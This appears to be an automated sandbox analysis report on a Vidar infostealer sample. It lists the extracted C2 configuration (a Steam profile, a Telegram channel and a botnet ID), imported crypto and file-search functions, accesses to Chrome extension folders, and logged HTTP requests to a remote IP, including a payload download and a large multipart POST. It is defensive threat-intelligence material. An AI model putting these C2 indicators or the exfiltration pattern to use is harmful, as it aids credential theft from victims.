Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp |
Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199545993403", "https://t.me/vogogor"], "Botnet": "b2ced91faf30889899f34458f95b8e93", "Version": "5.4"} |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004158A0 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, |
1_2_004158A0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040AA30 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA, |
1_2_0040AA30 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00415600 _memset,lstrlen,CryptStringToBinaryA,_memmove,lstrcat,lstrcat, |
1_2_00415600 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00415820 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, |
1_2_00415820 |
Source: |
Binary string: freebl3.pdb source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr |
Source: |
Binary string: mozglue.pdbP source: mozglue.dll.1.dr |
Source: |
Binary string: freebl3.pdbp source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr |
Source: |
Binary string: nss3.pdb@ source: nss3.dll.1.dr |
Source: |
Binary string: C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe |
Source: |
Binary string: softokn3.pdb@ source: softokn3.dll.1.dr |
Source: |
Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr |
Source: |
Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr |
Source: |
Binary string: 1C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe |
Source: |
Binary string: nss3.pdb source: nss3.dll.1.dr |
Source: |
Binary string: mozglue.pdb source: mozglue.dll.1.dr |
Source: |
Binary string: softokn3.pdb source: softokn3.dll.1.dr |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00412170 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_00412170 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004171C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA, |
1_2_004171C0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00412450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_00412450 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00412690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_00412690 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0041B7E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, |
1_2_0041B7E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040C8E0 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, |
1_2_0040C8E0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00424960 FindFirstFileW,FindNextFileW,FindNextFileW, |
1_2_00424960 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004169A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, |
1_2_004169A0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040AAC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, |
1_2_0040AAC0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00416BB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, |
1_2_00416BB0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040DE60 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, |
1_2_0040DE60 |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ |
Jump to behavior |
Source: unknown |
Network traffic detected: HTTP traffic on port 49774 -> 6012 |
Source: unknown |
Network traffic detected: HTTP traffic on port 6012 -> 49774 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49774 -> 6012 |
Source: unknown |
Network traffic detected: HTTP traffic on port 6012 -> 49774 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49774 -> 6012 |
Source: unknown |
Network traffic detected: HTTP traffic on port 6012 -> 49774 |
Source: global traffic |
HTTP traffic detected: GET /vogogor HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me |
Source: global traffic |
HTTP traffic detected: GET /b2ced91faf30889899f34458f95b8e93 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012 |
Source: global traffic |
HTTP traffic detected: GET /sp1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4389493767942367User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Content-Length: 126637Connection: Keep-AliveCache-Control: no-cache |